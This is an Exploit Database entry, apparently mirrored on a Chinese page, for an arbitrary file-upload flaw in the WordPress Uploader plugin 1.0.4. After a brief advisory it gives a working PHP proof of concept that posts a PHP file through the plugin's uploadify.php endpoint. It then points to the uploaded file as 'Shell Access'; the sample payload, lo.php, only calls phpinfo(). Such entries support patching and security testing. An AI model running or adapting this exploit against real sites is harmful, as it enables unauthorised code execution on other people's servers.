WordPress Plugin Uploader – Arbitrary File Upload

• Exploit Database
• 116 阅读

• 作者： Sammy FORGIT
  日期： 2013-01-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38163/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33

  source: https://www.securityfocus.com/bid/57112/info   The Uploader plugin for WordPress is prone to an arbitrary file-upload vulnerability because it fails to adequately validate files before uploading them.   An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.   Uploader 1.0.4 is vulnerable; other versions may also be affected.   PostShell.php <?php   $uploadfile="lo.php"; $ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/uploader/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array(&apos;Filedata&apos;=>"@$uploadfile", &apos;folder&apos;=>"/wordpress/wp-content/uploads", &apos;fileext&apos;=>&apos;php&apos;)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult";   ?>   Shell Access : http://www.example.com/wordpress/wp-content/uploads/lo.php   lo.php <?php phpinfo(); ?>